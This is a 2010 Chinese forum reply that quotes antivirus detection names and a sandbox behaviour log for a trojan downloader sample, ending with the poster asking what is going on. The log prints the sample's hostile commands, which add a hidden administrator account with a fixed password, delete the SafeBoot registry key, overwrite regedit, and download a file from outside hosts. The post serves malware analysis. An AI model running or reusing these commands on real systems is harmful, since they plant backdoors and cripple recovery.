本帖最后由 ssama 于 2010.7.11 10:53 编辑
回复 25楼 高木涉 的帖子
avast!
smss检测.exe [L] Win32:Flot-E [Trj]
Microsoft
TrojanDownloader:Win32/Small.gen!D
行为
Executing: j:\testvirus\smss检测.exe
CreateProcess((null),cmd.exe /c net localgroup administrators sk$ /add,(null))
CreateProcess((null),cmd.exe /c reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f,(null))
Copy(J:\TestVirus\smss检测.exe->C:\Documents and Settings\551x.exe)
Executing: c:\windows\system32\cmd.exe
CreateEvent(ConsoleIME_StartUp_Event)
CreateProcess((null),C:\Windows\system32\conime.exe,(null))
InternetOpen()
Executing: c:\windows\system32\conime.exe
CreateProcess(C:\Windows\System32\net.exe,net localgroup administrators sk$ /add,J:\TestVirus)
Executing: c:\windows\system32\net.exe
InternetConnect(www.rem.cn)HttpOpenRequest(/bbs/api/top/x.asp)
CreateProcess(C:\Windows\System32\net.exe,net user sk$ 123456 /add,J:\TestVirus)
CreateProcess((null),C:\Windows\system32\net1 localgroup administrators sk$ /add,(null))
RasEnumEntries()
OpenService(RASMAN)
CreateProcess(C:\Windows\System32\reg.exe,reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f,J:\TestVirus)
OpenService(Sens)
CreateProcess((null),C:\Windows\system32\net1 user sk$ 123456 /add,(null))
Executing: c:\windows\system32\net1.exe
Executing: c:\windows\system32\reg.exe
CreateMutex(Local\!IETld!Mutex)
bind(port=0)connect( 219.156.123.3:80 )
CreateToolhelp32Snapshot
URLDownloadToFile(http://www.hfbljd.com/WebEdit/Images/top/510.txt)
InternetConnect(www.hfbljd.com)HttpOpenRequest(/WebEdit/Images/top/510.txt)
connect( 127.0.0.1:59739 )
connect( 122.224.34.159:80 )
CreateFile(C:\Windows\x.dat)
DeleteFile(C:\Windows\iexplore.exe)
Copy(J:\TestVirus\smss检测.exe->C:\Documents and Settings\All Users\「开始」菜单\程序\启动551x.exe)
CreateProcess((null),cmd.exe /c taskkill /im regedit.exe /f,(null))
Copy(J:\TestVirus\smss检测.exe->C:\WINDOWS\regedit.exe)
CreateProcess(C:\Windows\System32\taskkill.exe,taskkill /im regedit.exe /f,J:\TestVirus)
Executing: c:\windows\system32\taskkill.exe
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED)
这是什么情况
ERROR
|